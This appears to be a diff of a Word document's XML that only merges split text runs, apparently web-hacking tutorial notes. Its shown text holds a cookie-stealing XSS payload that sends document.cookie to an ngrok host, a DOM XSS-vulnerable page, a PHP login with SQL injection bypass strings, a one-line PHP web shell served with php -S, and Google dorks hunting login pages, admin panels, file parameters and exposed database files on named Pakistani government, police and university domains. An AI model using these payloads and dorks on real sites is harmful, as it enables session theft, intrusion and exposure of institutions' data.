     </w:p>
     <w:p/>
@@ -7258,39 +4513,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>&lt;script&gt;new Image().</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">="https://15fc-152-57-199-156.in.ngrok.io/?cookie=" + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>;&lt;/script&gt;</w:t>
+        <w:t>&lt;script&gt;new Image().src="https://15fc-152-57-199-156.in.ngrok.io/?cookie=" + document.cookie;&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7328,15 +4551,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Unless adequate escaping or validation is performed for URL parameters, passing user-supplied input back into a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javascript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> or other web components is a common source of DOM Cross-Site Scripting (XSS) attacks.</w:t>
+        <w:t>- Unless adequate escaping or validation is performed for URL parameters, passing user-supplied input back into a javascript or other web components is a common source of DOM Cross-Site Scripting (XSS) attacks.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7353,15 +4568,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>&lt;html lang="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>en</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>"&gt;</w:t>
+        <w:t>&lt;html lang="en"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7407,28 +4614,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">2. Open chrome &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>visit:http</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>://192.168.1.111/1.html</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">3. Open </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Devloper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tools console</w:t>
+        <w:t>2. Open chrome &amp; visit:http://192.168.1.111/1.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3. Open Devloper tools console</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7458,15 +4649,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>&lt;html lang="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>en</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>"&gt;</w:t>
+        <w:t>&lt;html lang="en"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7488,114 +4671,25 @@
     <w:p>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>queryString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>location.search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">; // Extract the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>queryString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from the URL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>urlParams</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>URLSearchParams</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>queryString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">); // parse the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>queryString</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> name = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>urlParams.get</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>('name')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.write</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>('&lt;h1&gt; Hello, ' + name + '!&lt;/h1&gt;');</w:t>
+        <w:t>const queryString = location.search; // Extract the queryString from the URL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>const urlParams = new URLSearchParams(queryString); // parse the queryString</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>const name = urlParams.get('name')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>document.write('&lt;h1&gt; Hello, ' + name + '!&lt;/h1&gt;');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7620,15 +4714,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   &lt;h1&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DOMed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> page&lt;/h1&gt;</w:t>
+        <w:t xml:space="preserve">   &lt;h1&gt;DOMed page&lt;/h1&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7856,15 +4942,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a very old trick.</w:t>
+        <w:t>+ Its a very old trick.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7874,99 +4952,27 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>uname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=$_POST['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>uname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>'];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwrd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=$_POST['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwrd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>'];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">$query="select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>username,pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from users where username='$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>uname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>' and password='$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwrd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>' limit 0,1";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>$result=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mysql_query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>($query);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">$rows = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mysql_fetch_array</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>($result);</w:t>
+        <w:t>$uname=$_POST['uname'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$passwrd=$_POST['passwrd'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$result=mysql_query($query);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$rows = mysql_fetch_array($result);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7985,13 +4991,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>create_session</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>();</w:t>
+      <w:r>
+        <w:t>create_session();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8032,15 +5033,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">So </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lets</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Inject ' or ''=' into the Query:</w:t>
+        <w:t>So lets Inject ' or ''=' into the Query:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8095,22 +5088,13 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>SQLQuery</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>SQLQuery:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8147,44 +5131,12 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>username,pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> from users where username='' or ''='' and password='' or ''='' limit 0,1;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">so what </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> actually did is made the query to return true using the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>or</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t>select username,pass from users where username='' or ''='' and password='' or ''='' limit 0,1;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">so what i actually did is made the query to return true using the or. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8243,21 +5195,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>SQLQuery</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SQLQuery:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8294,85 +5237,37 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>username,pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> from users where username='' or true--' and password='' or ''='' limit 0,1;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Here anything after -- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>wont</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> be executed which makes the query to be:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>username,pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> from users where username='' or true;</w:t>
+        <w:t>select username,pass from users where username='' or true--' and password='' or ''='' limit 0,1;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Here anything after -- wont be executed which makes the query to be:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&gt; select username,pass from users where username='' or true;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9439,23 +6334,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>mkdir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> new</w:t>
+        <w:t>$ mkdir new</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9500,70 +6379,22 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>&lt;?</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> echo system($_GET['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>']); ?&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -S 192.168.47.167:80</w:t>
+        <w:t>&lt;?php echo system($_GET['cmd']); ?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ php -S 192.168.47.167:80</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9706,7 +6537,6 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -9714,30 +6544,20 @@
         </w:rPr>
         <w:t>site:cdac.in</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:cdac.in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -www</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:cdac.in -www</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9763,7 +6583,6 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -9771,31 +6590,21 @@
         </w:rPr>
         <w:t>intitle:Login</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">site:*.sindhpolice.gov.pk </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>intitle:Login</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:*.sindhpolice.gov.pk intitle:Login</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
@@ -9830,33 +6639,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">site:*.gov.pk </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>inurl:admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">site:*.gov.pk </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>inurl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>:"*.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>php?file</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>="</w:t>
+        <w:t>site:*.gov.pk inurl:admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>site:*.gov.pk inurl:"*.php?file="</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9891,13 +6679,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "index of /"</w:t>
+      <w:r>
+        <w:t>site:edu.pk "index of /"</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9939,229 +6722,103 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:pdf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:db</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:txt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:xlsx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:sql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:zip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>site:edu.pk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>filetype:tar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk filetype:pdf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
